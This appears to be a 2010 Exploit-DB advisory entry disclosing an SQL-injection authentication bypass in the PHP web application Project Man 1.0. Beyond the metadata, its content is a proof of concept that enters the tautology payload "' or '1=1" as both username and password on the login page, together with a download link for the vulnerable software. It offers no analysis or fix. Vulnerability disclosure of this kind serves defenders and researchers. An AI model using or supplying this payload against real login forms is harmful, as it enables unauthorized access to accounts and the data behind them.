Project Man 1.0 - Authentication Bypass

EDB-ID:

11584

Author:

cr4wl3r

Type:

webapps

Platform:

PHP

Published:

2010-02-27

##############################################################
##Project Man <= 1.0 (Auth Bypass) SQL Injection Vulnerability
##############################################################
Author: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
Download: http://sourceforge.net/projects/projectman1/files/
##############################################################
PoC:
 [Project Man_path]/login.php

Username: ' or '1=1 
password: ' or '1=1 
##############################################################